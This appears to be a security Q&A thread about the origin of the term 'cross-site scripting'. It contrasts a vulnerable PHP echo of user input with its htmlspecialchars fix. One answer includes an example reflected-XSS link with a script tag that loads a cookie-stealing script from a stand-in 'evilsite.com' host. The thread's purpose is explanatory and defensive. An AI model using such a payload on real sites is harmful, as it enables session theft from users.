24

Why is Cross-site scripting called Cross-site scripting? The term implies to me (a non-native English speaker) that there is some other web site involved that attacks your web site, but most of the time this is not the case, is it? (Hell, it doesn't always even include scripting (feeding JavaScript to the user) either. A faked HTML interface is often a viable execution strategy too.)

As I understand it, that which we call XSS is caused by an insufficient escaping of user input and primarily happens in web applications, as shown in this question. For example, the following piece of code is vulnerable:

<?php
echo $_GET['q'];
?>

But the following fixes it[1]:

<?php
echo htmlspecialchars($_GET['q']);
?>

The user input can be stored in the database too, and the same thing happens if the input is not escaped when it is brought back for display. And in fact, this seems to be the method of attack that is the most beneficial for the attacker (affects the most users) and thus the most used.

I feel that the nebulousness of the term leads to hack jobs such as removing offending characters or strings from user input and other confusion (apparently allowing valid JavaScript in the database is wrong) when inexperienced people are trying to patch for it.

Instead of the abstruse term XSS, wouldn't something like lack of escaping work just as well, and be much clearer? Or is there something more that the term XSS encompasses?

[1]: Assuming we are in the middle of a HTML page, of course.

oals
  • 349
  • 2
  • 4
  • 2
    Wiki explains the meaning of the original term: https://en.wikipedia.org/wiki/Cross-site_scripting#Background – schroeder Sep 01 '16 at 21:40

2 Answers2

15

From the link schroeder gave in the comment the origin of the "Cross" in XSS becomes apparent: the first XSS was because Alex goes to evilsite.com and sees a link saying: 'see cute puppies on nicesite.com?q=puppies&<script src="evilsite.com/steal_auth_cookie.js"></script>'. Clicking on the link on evilsite.com results in a redirection to nicesite.com . The combination of nicesite.com failing to escape the query parameter puppies&<script src="evilsite.com/steal_auth_cookie.js"></script> before writing it to the page produces the cross site attack by loading the evilsite.com script. (example simplified from wikipedia article). This attack (known specifically as a reflected and non-persistent XSS) is cross site because it came from and required evil.com, as opposed to only requiring a vulnerability in nicesite.com.

(* Edit: * As pointed out in the comments the link can also come from an email or a different site. So you could also go to othersite.com and click the link pointing to nicesite.com with the XSS payload for evilsite.com.)

Microsoft security-engineers introduced the term "cross-site scripting" in January 2000. The expression "cross-site scripting" originally referred to the act of loading the attacked, third-party web application from an unrelated attack-site, in a manner that executes a fragment of JavaScript prepared by the attacker in the security context of the targeted domain (taking advantage of a reflected or non-persistent XSS vulnerability).

It goes on to explain that XSS term has broadened to now include things that don't involve cross site.

The definition gradually expanded to encompass other modes of code injection, including persistent and non-JavaScript vectors (including ActiveX, Java, VBScript, Flash, or even HTML scripts), causing some confusion to newcomers to the field of information security.

Regarding a different, more descriptive and less confusing name. From my research it seems you are correct in stating this is a class of vulnerabilities from not escaping user content. Naming is hard so it's unlikely to change. The only one I could think up briefly was Unescaped Scripting Attack, but the acronym USA is already taken!

By the way this is an excellent question and one I pondered myself.

AJP
  • 359
  • 2
  • 6
  • 2
    I also think this technique only requires a vulnerability in nicesite.com, who should bear the sole responsibility of properly escaping search parameters in the URL. On the other hand, irrelevant.com should not forbid links even if the URL is very weird. It could alert the user, though. – wlnirvana Feb 20 '20 at 06:23
  • Thanks @wlnirvana I've made an edit. – AJP Feb 20 '20 at 21:13
7

The site in cross-site scripting relates to a site (host, machine, client-side, server-side, location, environment and such) not to website. This may cause the confusion. In addition, the X (cross) was chosen instead of the C to distinguish between the styling language and this type of attack.

schroeder
  • 123,438
  • 55
  • 284
  • 319
Yorick de Wid
  • 3,346
  • 14
  • 22
  • 5
    While it does help prevent confusion between XSS and CSS I don't think that is the reason for the X. In the United States and other native English speaking areas 'X' is a common substitution for the abbreviation of crossing. On signs and road ways they even use the term 'Xing'. https://en.wikipedia.org/wiki/X#English – Bacon Brad Sep 01 '16 at 22:54
  • @baconface it could very well be so, I've never checked that. Ty – Yorick de Wid Sep 01 '16 at 23:28
  • 4
    I think the main concern of the OP is why this exploit is called cross-site scripting, not why cross-site scripting is acronymed as XSS. – wlnirvana Feb 20 '20 at 05:20